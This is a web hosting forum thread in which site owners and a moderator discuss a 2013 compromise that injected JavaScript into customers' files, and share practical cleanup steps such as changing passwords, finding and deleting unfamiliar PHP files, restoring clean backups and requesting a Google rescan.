Page 1 of 3 123 LastLast
Results 1 to 10 of 25
  1. #1
    Junior Member
    Join Date
    Jan 2010
    Posts
    17

    Default Malicious code on server

    I just got the email about sites being compromised and passwords have been changed and they list things to do to secure your site. One thing they list is check all files for malicious code but doesn't Westhost do that on their servers or should I as a website owner. If I have to do this how do we, they never really say and it would be nice of them to give a little more info than simply "Review and clean your files"

  2. #2
    Member
    Join Date
    Aug 2008
    Location
    Odessa
    Posts
    30

    Default

    Quote Originally Posted by jeffopus View Post
    I just got the email about sites being compromised and passwords have been changed and they list things to do to secure your site. One thing they list is check all files for malicious code but doesn't Westhost do that on their servers or should I as a website owner. If I have to do this how do we, they never really say and it would be nice of them to give a little more info than simply "Review and clean your files"
    I agree. A more elaborate explanation would help. I have learned that if you have a virus on your site, it shows up as javscript written on your html files. Those files are the ones on the server not your clean ones at home on your computer. I know how to use Notepad++ to search through files on my computer for a sample of text but I don't know how to do it online. I also wouldn't know what text or symbols to search for. Maybe there's software that does it like the kind we use for our computers.

  3. #3
    Moderator wildjokerdesign's Avatar
    Join Date
    Jun 2003
    Location
    Kansas City Mo
    Posts
    5,721

    Default

    Well the notice did mention that those accounts that had actually been compromised would be contacted with further information. I think maybe it is always a bit of situation of not wanting to reveal too much in fear that you may be enabling the "bad guy". I am not sure that in this case that is true though. Ok so I had two accounts that where compromised. The first I was able to catch before they where actually able to complete the attack. Here is what I encountered and how I handled it. I must preface this though that my skills are a bit more advanced then many website owners. I understand HTML, PHP, JavaScript and other programing languages. It may be easier to simply have Westhost deal with this for you.

    First step before anything else. Get the password changed for the account in question. At this point it may mean you need to contact Westhost direct and verify you are the account owner.

    I use a free program called WinSCP to SFTP into my account and manage files. This allows me to easily view files on the remote servers. I can see the modified dates of each file so it is easy to spot new files that are uploaded to the server are have been modified. This is how I was able to find malicious code that had been uploaded. In this case it was two files but unfortunately they where randomly named. I am very aware of the files on my accounts so spotted them as not being part of my site and removed them. Like I said on one account that was as far as the hackers had gotten and they had not used the files to write the JavaScript to my other files. On the other site they had gotten to my files. I did attempt to clean them manually by opening up and editing the files on the server (I use EditPlus in combination with WinSCP to view contents of server files) but it was so widespread and in so many files I gave up and simply used a clean backup copy of the files and replaced the ones on the server.

    So there you have it. Not even sure I did it justice. You can kind of see why WestHost may not have given more detailed instructions.
    Shawn
    Please remember your charity of choice: http://www.redcross.org

    Handy Links: wildjokerdesign.net | Plain Text Editors: EditPlus | Crimson

  4. #4

    Default I just had a client contact me about this

    I just got an email from a client about this.. So much for installing the kitchen cabinets today )

    I'm not sure exactly what is going on with this. Was it everyone on a server??

    The site in questions is running on Joomla 1.5. I"ll talk to him about uprading to 2.5.x. That won't be that big of a deal as it is a small site.

    Anyway, I'm going to go in and see if I can change the password for the account, Then I'll set up j 2.5.14 and migrate it.

    It would be nice to have some more info as to exactly what happened so I don't chase wild gooses.

    BTW - I figured this was legit when I called and they said "You number in the que is fifteen <Muffled laughter in the background>"

  5. #5
    Moderator wildjokerdesign's Avatar
    Join Date
    Jun 2003
    Location
    Kansas City Mo
    Posts
    5,721

    Default

    Upgrading I think should take care of things for them. That should overwrite any files that would have gotten corrupted.

    While you are in there look for two .php files that do not look like part of the Joomla program. Check in js or css directories. One of the php files is in clear readable text and the other is encoded. Get rid of them!

    You more then likely will have to contact WH though to get them to reset the password before you can even get into the account in question.
    Shawn
    Please remember your charity of choice: http://www.redcross.org

    Handy Links: wildjokerdesign.net | Plain Text Editors: EditPlus | Crimson

  6. #6
    Moderator wildjokerdesign's Avatar
    Join Date
    Jun 2003
    Location
    Kansas City Mo
    Posts
    5,721

    Default

    I forgot to mention this in this thread.

    You need to make sure that Google is not listing you as an infected site. Both of mine where and I had to use https://www.google.com/webmasters/tools to get it sorted out. If you don't already use the tools then you are going to have to first set things up and add any domains you need monitored/rescanned. You are going to upload a file that google supplies to your public root in order to verify you are the owner, so make sure you have access before you begin. Not to mention you need to make sure all is clean before you have them re-scan.

    Why is this important? If Google has you on the listed as an infected site then browser that check that list (Chrome and FF do I know) will block the site. All your Google search links will also be redirected to a page at Google warning of the infection.
    Shawn
    Please remember your charity of choice: http://www.redcross.org

    Handy Links: wildjokerdesign.net | Plain Text Editors: EditPlus | Crimson

  7. #7
    Junior Member
    Join Date
    Jan 2010
    Posts
    17

    Default

    The main thing I want to know is what they are doing to prevent this and what we can do after an infection to clean things up as well as prevent this. They say to change passwords which is a pain when you have emails and site databases but it is not too much of a pain but how do we clean things up and prevent in the future. They don't tell us anything about that other than to keep things updated which is a given in my opinion. How about a site or program that checks for and removes malicious code from our sites?

    I understand it is not exactly their job to prevent malicious files on our sites but some clue as to what to do and where to go would be helpful, please have a post added to the forum about helpful advice, sites to look for help or something.

    My son has already said to check ut W3C Validator to look for infections and malware as well as SiteLock which I will be checking out but WestHost doesn't even say anything about stuff like this, I had noclue someone could do this knd of stuff until it happened to me and then WestHost says to clean up my site but nothing as to how to do this.

    Please give us some kind of idea about what we can do and where we can get information about this instead of just telling us to clean our site and files.
    Last edited by jeffopus; 09-08-2013 at 02:21 PM.

  8. #8
    Moderator wildjokerdesign's Avatar
    Join Date
    Jun 2003
    Location
    Kansas City Mo
    Posts
    5,721

    Default

    Jeff,

    It was a dictionary attack on FTP accounts. Something very hard to prevent. Changing passwords can help, but I agree it can be a big pain. I am pretty sure there is a program in place that can scan for malicious content, but do to the nature of the ever changing attacks it is really hard to write programing that actually cleans it up. Using a backup of the site before the infection occurred is really the only automatic process that could be employed but that also has it's disadvantages. Let's say you have a site where you let your users upload images. Any images that where uploaded after the backup would be lost. This could really upset some people if WestHost did an automatic restore of data. From what I am hearing on the forums here is was not an attack on a particular CMS which makes things even more complicated.

    In this case the hackers scanned for java-script files in your public root and then added their malicious code to it. On a CMS this can be a lot of files. I think maybe it even looked for html files that looked like they may be index files and tried adding it to them. As far as I was able to figure out it did not touch the database which was a good thing. So I actually used a clean copy of the software files to replace the ones on the server, but I know how my CMS software works and is organized.

    Get to know the programs you use on your site. Wordpress, Joomala and most other CMS's have good documentation. Many even have information on what you can do if your site get's hacked. Armed with that information you can better maintain your site. Some actually have add-ons that can help scan for stuff like this but beware they can also often cripple a normal site and make it in-usable by your users. They may be able to see your site but any editing, upload or posting to the site may be blocked. In this case such an add-on would not have helped you.

    There are services you can pay for out there that will keep track of your site and look for problems (Google Webmaster Tools does this but is free) but as a rule they detect an issue after it has happened and can simply notify you of the problem. Good place to start and at least you know something is wrong.

    I am not aware of any software that would be affordable that could really protect your site completely. If they claim they can I would be skeptical of them.
    Shawn
    Please remember your charity of choice: http://www.redcross.org

    Handy Links: wildjokerdesign.net | Plain Text Editors: EditPlus | Crimson

  9. #9
    Moderator wildjokerdesign's Avatar
    Join Date
    Jun 2003
    Location
    Kansas City Mo
    Posts
    5,721

    Default

    Something else. If you have a copy of the clean install of wordpress on your local computer then you can actually use it to compare with the files on the server. In fact some FTP programs have a feature built into them that will compare the files for you. That would be one way to check for changed and infected files or even new files that have been uploaded that may be suspect. May help in tracking things down.
    Shawn
    Please remember your charity of choice: http://www.redcross.org

    Handy Links: wildjokerdesign.net | Plain Text Editors: EditPlus | Crimson

  10. #10
    Senior Member
    Join Date
    Sep 2003
    Posts
    206

    Default

    I too had a attack on an account which resulted in almost all files having javascript injection. The tech support mentioned a cPanel hack as a possibility. I really don't know much about this so I searched around for some info, is it possible that the cPanel server was hacked because of the scope of the attack instead of a dictionary attack on each site? possibly something similar to the following:

    http://arstechnica.com/security/2013...ediate-action/

    Fortunately I discovered the problem a couple hours after the event. And tech support was very helpful with a restore. Although I do have some new login issues that I need to work through.

    A couple questions:

    What was the javascript that I saw? what was the goal of the attack?

    Are sites that scan for site malware effective such as: http://sitecheck.sucuri.net/scanner/

    Any other tools that are better than the one above?

    The email mentions the need to change every password, MySQL and email.... just a precaution or is there another vulnerability that was exposed?

    thanks,

    j
    Last edited by J_M; 09-08-2013 at 08:22 PM.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •